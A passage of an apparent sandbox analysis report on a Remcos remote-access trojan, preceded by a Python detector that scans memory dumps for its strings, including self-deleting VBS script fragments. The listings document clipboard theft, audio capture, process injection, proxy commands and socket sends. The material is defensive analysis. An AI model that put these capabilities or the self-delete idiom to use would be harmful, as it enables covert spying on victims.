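Several of the routines listed above carry strings that are specific to this Remcos build: the "Uploading file to Controller: " banner in the file-upload loop, the `wnd_`/`time_` capture-file formats, the `{ User has been idle for ... minutes }` keylogger marker, the `CloseChat`/`DisplayMessage` chat commands and the self-deleting VBS uninstall script built from `CreateObject("WScript.Shell").Run "cmd /c ""` and `CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)`. The following added Python example, which is not code from the report or from Remcos, scans a byte buffer (a process memory dump or a dropped `.vbs`) for those strings in both ASCII and UTF-16LE and reports which capability groups are present. It only calls the buffer Remcos-like when at least two groups match, because the VBS self-delete idiom on its own also occurs in legitimate cleanup scripts. The grouping of strings by capability, the threshold and the sample buffers are this example's own assumptions.

```python
from typing import Dict, Iterator, List, Tuple

# Strings recovered from the RegAsm memory dump (String IDs in the sections above), grouped
# by the routine they appear in. The grouping is this example's reading of the listing,
# not a classification made by the report.
REMCOS_STRINGS: Dict[str, List[bytes]] = {
    "file upload to controller": [b"Uploading file to Controller: "],
    "screen capture": [b"wnd_%04i%02i%02i_%02i%02i%02i", b"time_%04i%02i%02i_%02i%02i%02i"],
    "keylogger idle marker": [b"User has been idle for ", b" minutes }"],
    "chat window": [b"CloseChat", b"DisplayMessage"],
    "self-deleting VBS uninstall": [
        b'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)',
        b'CreateObject("WScript.Shell").Run "cmd /c ""',
    ],
}


def _encodings(needle: bytes) -> Iterator[Tuple[str, bytes]]:
    """Yield the needle as narrow and as wide (UTF-16LE) bytes; Remcos mixes both."""
    yield "ascii", needle
    yield "utf-16le", needle.decode("ascii").encode("utf-16-le")


def find_indicators(buf: bytes) -> Dict[str, List[Tuple[bytes, str, int]]]:
    """Return every capability group whose strings occur in buf, as (string, encoding, offset)."""
    hits: Dict[str, List[Tuple[bytes, str, int]]] = {}
    for capability, needles in REMCOS_STRINGS.items():
        for needle in needles:
            for enc, pattern in _encodings(needle):
                off = buf.find(pattern)
                while off != -1:
                    hits.setdefault(capability, []).append((needle, enc, off))
                    off = buf.find(pattern, off + 1)
    return hits


def classify(buf: bytes, min_capabilities: int = 2) -> Tuple[bool, List[str]]:
    """Call the buffer Remcos-like only when strings from at least `min_capabilities`
    distinct groups are present; a lone self-delete VBS idiom is too weak on its own."""
    caps = sorted(find_indicators(buf))
    return len(caps) >= min_capabilities, caps


# Constructed buffer standing in for a memory dump; not data from the sandbox run.
# The "del dropped.exe" command and the padding are invented filler.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"Uploading file to Controller: "
    + b"\x00" * 8
    + "wnd_%04i%02i%02i_%02i%02i%02i".encode("utf-16-le")
    + b"\x00" * 8
    + b'CreateObject("WScript.Shell").Run "cmd /c ""del dropped.exe""", 0\r\n'
    + b'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n'
)

# Constructed benign cleanup script: uses the same self-delete idiom and nothing else.
BENIGN_CLEANUP_VBS = (
    b'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n'
)

if __name__ == "__main__":
    for label, buf in (("sample dump", SAMPLE_DUMP), ("benign vbs", BENIGN_CLEANUP_VBS)):
        verdict, caps = classify(buf)
        print(f"{label}: remcos-like={verdict} groups={caps}")
        for cap, found in find_indicators(buf).items():
            for needle, enc, off in found:
                print(f"  {cap}: {needle[:32]!r} ({enc}) at 0x{off:x}")
```

Against a real dump, feed `find_indicators` the `.sdmp` regions listed under Memory Dump Source; the UTF-16LE pass matters because several of the strings above are consumed by wide-character APIs (GetWindowTextW, CreateDirectoryW) and may only exist in that form.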
                                          APIs
                                            • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                          • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                          • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                          • String ID: 0VG$0VG$<$@$Temp
                                          • API String ID: 1704390241-2575729100
                                          • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                          • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                          • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                          • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                          APIs
                                          • OpenClipboard.USER32 ref: 0041697C
                                          • EmptyClipboard.USER32 ref: 0041698A
                                          • CloseClipboard.USER32 ref: 00416990
                                          • OpenClipboard.USER32 ref: 00416997
                                          • GetClipboardData.USER32 ref: 004169A7
                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                          • CloseClipboard.USER32 ref: 004169BF
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                          • String ID: !D@
                                          • API String ID: 2172192267-604454484
                                          • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                          • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                          • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                          • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                          • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                          • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                          • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                          APIs
                                          • _free.LIBCMT ref: 004481B5
                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 004481C1
                                          • _free.LIBCMT ref: 004481CC
                                          • _free.LIBCMT ref: 004481D7
                                          • _free.LIBCMT ref: 004481E2
                                          • _free.LIBCMT ref: 004481ED
                                          • _free.LIBCMT ref: 004481F8
                                          • _free.LIBCMT ref: 00448203
                                          • _free.LIBCMT ref: 0044820E
                                          • _free.LIBCMT ref: 0044821C
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                          • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                          • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                          • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                          APIs
                                          • _free.LIBCMT ref: 100059EA
                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                          • _free.LIBCMT ref: 100059F6
                                          • _free.LIBCMT ref: 10005A01
                                          • _free.LIBCMT ref: 10005A0C
                                          • _free.LIBCMT ref: 10005A17
                                          • _free.LIBCMT ref: 10005A22
                                          • _free.LIBCMT ref: 10005A2D
                                          • _free.LIBCMT ref: 10005A38
                                          • _free.LIBCMT ref: 10005A43
                                          • _free.LIBCMT ref: 10005A51
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                          • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                          • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                          • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Eventinet_ntoa
                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                          • API String ID: 3578746661-3604713145
                                          • Opcode ID: a5e6e4f700d91bea08a307d1eb73f3d8dd4849c16ac7e93ec8f1d67ca6239f50
                                          • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                          • Opcode Fuzzy Hash: a5e6e4f700d91bea08a307d1eb73f3d8dd4849c16ac7e93ec8f1d67ca6239f50
                                          • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                          APIs
                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DecodePointer
                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                          • API String ID: 3527080286-3064271455
                                          • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                          • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                          • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                          • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                          • Sleep.KERNEL32(00000064), ref: 0041755C
                                          • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateDeleteExecuteShellSleep
                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                          • API String ID: 1462127192-2001430897
                                          • Opcode ID: e113b56b21605da8d413aa31776797b2f5429e31524f400d16683b1a7354063e
                                          • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                          • Opcode Fuzzy Hash: e113b56b21605da8d413aa31776797b2f5429e31524f400d16683b1a7354063e
                                          • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentProcess
                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                          • API String ID: 2050909247-4242073005
                                          • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                          • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                          • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                          • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                          APIs
                                          • _strftime.LIBCMT ref: 00401D50
                                            • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                          • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                          • API String ID: 3809562944-243156785
                                          • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                          • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                          • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                          • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                          • int.LIBCPMT ref: 00410EBC
                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                          • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                          • String ID: ,kG$0kG
                                          • API String ID: 3815856325-2015055088
                                          • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                          • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                          • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                          • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                          APIs
                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                          • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                          • waveInStart.WINMM ref: 00401CFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                          • String ID: dMG$|MG$PG
                                          • API String ID: 1356121797-532278878
                                          • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                          • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                          • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                          • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                            • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                            • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                            • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                          • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                          • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                          • TranslateMessage.USER32(?), ref: 0041D57A
                                          • DispatchMessageA.USER32(?), ref: 0041D584
                                          • GetMessageA.USER32 ref: 0041D591
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                          • String ID: Remcos
                                          • API String ID: 1970332568-165870891
                                          • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                          • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                          • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                          • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                          • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                          • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                          • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                          APIs
                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                          • __alloca_probe_16.LIBCMT ref: 00453F6A
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                          • __alloca_probe_16.LIBCMT ref: 00454014
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                          • __freea.LIBCMT ref: 00454083
                                          • __freea.LIBCMT ref: 0045408F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                          • String ID:
                                          • API String ID: 201697637-0
                                          • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                          • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                          • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                          • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • _memcmp.LIBVCRUNTIME ref: 004454A4
                                          • _free.LIBCMT ref: 00445515
                                          • _free.LIBCMT ref: 0044552E
                                          • _free.LIBCMT ref: 00445560
                                          • _free.LIBCMT ref: 00445569
                                          • _free.LIBCMT ref: 00445575
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorLast$_abort_memcmp
                                          • String ID: C
                                          • API String ID: 1679612858-1037565863
                                          • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                          • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                          • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                          • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                          Strings
                                          Memory Dump Source
